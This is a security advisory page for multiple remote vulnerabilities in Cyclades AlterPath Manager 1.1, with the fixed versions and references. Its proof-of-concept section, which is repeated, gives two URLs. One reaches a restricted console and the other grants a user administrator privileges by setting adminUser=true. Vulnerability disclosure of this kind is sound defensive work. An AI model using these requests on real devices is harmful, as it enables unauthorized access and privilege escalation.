Cyclades AlterPath Manager Multiple Remote Vulnerabilities
BID:12649
Info
Cyclades AlterPath Manager Multiple Remote Vulnerabilities
| Bugtraq ID: | 12649 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 24 2005 12:00AM |
| Updated: | Feb 24 2005 12:00AM |
| Credit: | Sullo <[email protected]> is credited with the discovery of these issues. |
| Vulnerable: |
Cyclades Corporation AlterPath 1.1 |
| Not Vulnerable: |
Cyclades Corporation AlterPath 1.2.1 Cyclades Corporation AlterPath 1.2 |
Discussion
Cyclades AlterPath Manager Multiple Remote Vulnerabilities
Cyclades AlterPath Manager is a network device designed to facilitate remote administration of all network-accessible infrastructure resources.
Multiple remote vulnerabilities affect Cyclades AlterPath Manager. These issues are due to various design errors that affect the overall security of the vulnerable device.
The first issue is an information disclosure issue. The second would allow unauthorized access to restricted console resources. Finally the third issue will facilitate privilege escalation.
An attacker may leverage these issues to gain unauthorized access to network-based resources, to gain escalated privileges and to gain access to potentially sensitive information.
It should be noted that although only version 1.1.0 of the software is reported affected by these issues, it is likely earlier versions are affected as well.
Cyclades AlterPath Manager is a network device designed to facilitate remote administration of all network-accessible infrastructure resources.
Multiple remote vulnerabilities affect Cyclades AlterPath Manager. These issues are due to various design errors that affect the overall security of the vulnerable device.
The first issue is an information disclosure issue. The second would allow unauthorized access to restricted console resources. Finally the third issue will facilitate privilege escalation.
An attacker may leverage these issues to gain unauthorized access to network-based resources, to gain escalated privileges and to gain access to potentially sensitive information.
It should be noted that although only version 1.1.0 of the software is reported affected by these issues, it is likely earlier versions are affected as well.
Exploit / POC
Cyclades AlterPath Manager Multiple Remote Vulnerabilities
No exploit is required to leverage these issues. The following proof of concepts have been provided:
To access a restricted console resource:
http://www.example.com/usermode/consoleConnect.jsp?consolename=console_name
To gain escalated privileges:
http://www.example.com/application/saveUser.do?userId=9&password=&userName=my_id&fullName=My+name&department=Security&location=Work&phone=555-1212&mobile=&pager=&email=test%40example.com&status=Enable&localPassword=true&adminUser=true&forward=&action=Save
No exploit is required to leverage these issues. The following proof of concepts have been provided:
To access a restricted console resource:
http://www.example.com/usermode/consoleConnect.jsp?consolename=console_name
To gain escalated privileges:
http://www.example.com/application/saveUser.do?userId=9&password=&userName=my_id&fullName=My+name&department=Security&location=Work&phone=555-1212&mobile=&pager=&email=test%40example.com&status=Enable&localPassword=true&adminUser=true&forward=&action=Save
Solution / Fix
Cyclades AlterPath Manager Multiple Remote Vulnerabilities
Solution:
The vendor has reported that these vulnerabilities are addressed in AlterPath version 1.2.0 or higher. Customers are advised to contact the vendor for further details regarding obtaining and applying an appropriate fix.
Solution:
The vendor has reported that these vulnerabilities are addressed in AlterPath version 1.2.0 or higher. Customers are advised to contact the vendor for further details regarding obtaining and applying an appropriate fix.
References
Cyclades AlterPath Manager Multiple Remote Vulnerabilities
References:
References:
- AlterPath Manager (APM) allows any connected user grant themselves administrator (CIRT)
- AlterPath Manager (APM) allows any connected user to access any console, ignorin (CIRT)
- AlterPath Manager (APM) reveals sensitive system information without authenticat (CIRT)
- AlterPath Manager Home Page (Cyclades)